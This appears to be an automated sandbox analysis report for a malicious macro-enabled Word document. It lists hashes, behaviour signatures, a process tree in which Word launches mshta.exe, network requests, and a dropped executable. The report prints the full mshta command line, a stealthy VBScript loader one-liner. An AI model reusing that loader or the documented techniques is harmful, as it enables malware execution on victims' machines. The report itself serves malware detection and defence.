Analysis
-
max time kernel
144s -
max time network
143s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
10-05-2021 16:09
Static task
static1
Behavioral task
behavioral1
Sample
document.docm
Resource
win7v20210408
Behavioral task
behavioral2
Sample
document.docm
Resource
win10v20210410
General
-
Target
document.docm
-
Size
68KB
-
MD5
da3992522a61736e5dbc5c32978f05fe
-
SHA1
670f0d608571fa8d799a98232cf2c16e8ccb9289
-
SHA256
e6afaabd1e4a2c7adeedca6ee0ed095271a53a293162e3cf7ed52d570279258e
-
SHA512
a2c3eee48add8eabf4fbe86a9e699fda302c143823f6ea3a629becf03d3d539aacfeabce52514e4b73e0db6d827031aec13e576a113f0aec92d0f7eb92f1c32a
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
mshta.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 3988 508 mshta.exe WINWORD.EXE -
Blocklisted process makes network request 3 IoCs
Processes:
mshta.exeflow pid process 24 3988 mshta.exe 26 3988 mshta.exe 28 3988 mshta.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
task-7655.exepid process 1292 task-7655.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WINWORD.EXEdescription ioc process File opened (read-only) \??\N: WINWORD.EXE File opened (read-only) \??\Q: WINWORD.EXE File opened (read-only) \??\R: WINWORD.EXE File opened (read-only) \??\T: WINWORD.EXE File opened (read-only) \??\U: WINWORD.EXE File opened (read-only) \??\X: WINWORD.EXE File opened (read-only) \??\G: WINWORD.EXE File opened (read-only) \??\I: WINWORD.EXE File opened (read-only) \??\O: WINWORD.EXE File opened (read-only) \??\P: WINWORD.EXE File opened (read-only) \??\V: WINWORD.EXE File opened (read-only) \??\W: WINWORD.EXE File opened (read-only) \??\B: WINWORD.EXE File opened (read-only) \??\L: WINWORD.EXE File opened (read-only) \??\F: WINWORD.EXE File opened (read-only) \??\H: WINWORD.EXE File opened (read-only) \??\J: WINWORD.EXE File opened (read-only) \??\S: WINWORD.EXE File opened (read-only) \??\Z: WINWORD.EXE File opened (read-only) \??\A: WINWORD.EXE File opened (read-only) \??\E: WINWORD.EXE File opened (read-only) \??\Y: WINWORD.EXE File opened (read-only) \??\K: WINWORD.EXE File opened (read-only) \??\M: WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 24 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WINWORD.EXEdescription pid process Token: SeShutdownPrivilege 508 WINWORD.EXE Token: SeCreatePagefilePrivilege 508 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WINWORD.EXEmshta.exedescription pid process target process PID 508 wrote to memory of 504 508 WINWORD.EXE splwow64.exe PID 508 wrote to memory of 504 508 WINWORD.EXE splwow64.exe PID 508 wrote to memory of 3988 508 WINWORD.EXE mshta.exe PID 508 wrote to memory of 3988 508 WINWORD.EXE mshta.exe PID 3988 wrote to memory of 1292 3988 mshta.exe task-7655.exe PID 3988 wrote to memory of 1292 3988 mshta.exe task-7655.exe PID 3988 wrote to memory of 1292 3988 mshta.exe task-7655.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document.docm" /o ""1⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SYSTEM32\mshta.exemshta.exe "about:<script language=VBScript>moveTo 0,-9999:Execute(CreateObject("Scripting.FileSystemObject").GetStandardStream(0).ReadAll()):sub window_onload:Close:End Sub</script><hta:application showintaskbar=no />"2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\task-7655.exe"C:\Users\Admin\AppData\Local\Temp\task-7655.exe"3⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\task-7655.exeMD5
ff9114e748fe6848ffe61cad56a10622
SHA192d27cf7f04ae2213bc94fafa554247565ea7253
SHA2566f406656b410d72762ddc2419076efadc16d07e9a1e7b10fd91e9c53281efe06
SHA5126ec36ab0c2df6046ca2b1251cc736753892fd8514366ee8b395e276e5c31fe6e6c743ea94c7b5b8a63b773584bf3ad788d3be77c3d3ad2cdb2b62aab15c4a54e
-
C:\Users\Admin\AppData\Local\Temp\task-7655.exeMD5
ff9114e748fe6848ffe61cad56a10622
SHA192d27cf7f04ae2213bc94fafa554247565ea7253
SHA2566f406656b410d72762ddc2419076efadc16d07e9a1e7b10fd91e9c53281efe06
SHA5126ec36ab0c2df6046ca2b1251cc736753892fd8514366ee8b395e276e5c31fe6e6c743ea94c7b5b8a63b773584bf3ad788d3be77c3d3ad2cdb2b62aab15c4a54e
-
memory/504-179-0x0000000000000000-mapping.dmp
-
memory/508-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-181-0x000001AB0F530000-0x000001AB0F540000-memory.dmpFilesize
64KB
-
memory/508-118-0x00007FF970E10000-0x00007FF973933000-memory.dmpFilesize
43.1MB
-
memory/508-122-0x00007FF969780000-0x00007FF96A86E000-memory.dmpFilesize
16.9MB
-
memory/508-123-0x00007FF967880000-0x00007FF969775000-memory.dmpFilesize
31.0MB
-
memory/508-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-114-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-183-0x000001AB0F530000-0x000001AB0F540000-memory.dmpFilesize
64KB
-
memory/508-184-0x000001AB0F530000-0x000001AB0F540000-memory.dmpFilesize
64KB
-
memory/508-182-0x000001AB0F540000-0x000001AB0F550000-memory.dmpFilesize
64KB
-
memory/508-185-0x000001AB0F530000-0x000001AB0F540000-memory.dmpFilesize
64KB
-
memory/508-186-0x000001AB0F530000-0x000001AB0F540000-memory.dmpFilesize
64KB
-
memory/508-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/1292-187-0x0000000000000000-mapping.dmp
-
memory/3988-180-0x0000000000000000-mapping.dmp